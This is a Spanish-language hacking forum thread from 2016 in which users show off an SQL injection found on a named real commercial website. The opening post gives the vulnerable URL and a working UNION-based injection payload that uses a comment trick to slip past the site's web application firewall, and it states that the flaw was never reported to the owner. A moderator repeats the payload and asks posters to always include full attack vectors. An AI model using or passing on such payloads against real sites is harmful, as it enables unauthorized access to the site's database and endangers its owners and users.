Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: --- en Agosto 03, 2016, 12:00:04 am

Título: [SQLI] www.quicktrade.co.in
Publicado por: --- en Agosto 03, 2016, 12:00:04 am
Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..

(http://i.imgur.com/HujIvpK.png)

(http://i.imgur.com/VKTN3GA.png)

Link: http://www.quicktrade.co.in/
Payload: http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+
Autor: Vasyyyl.
Reportado: No
Título: Re:[SQLI]www.quicktrade.co.in
Publicado por: EPSILON en Agosto 03, 2016, 08:22:56 am
Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por ESTAS (https://underc0de.org/foro/hacking-showoff/queres-que-tu-bug-aparezca-en-hacking-showoff) reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:
Código: You are not allowed to view links. Register or Login
http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON
Título: Re:[SQLI] www.quicktrade.co.in
Publicado por: --- en Agosto 03, 2016, 11:33:40 am
HOSTIAA es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @EPSILON (https://underc0de.org/foro/index.php?action=profile;u=42897)  ;D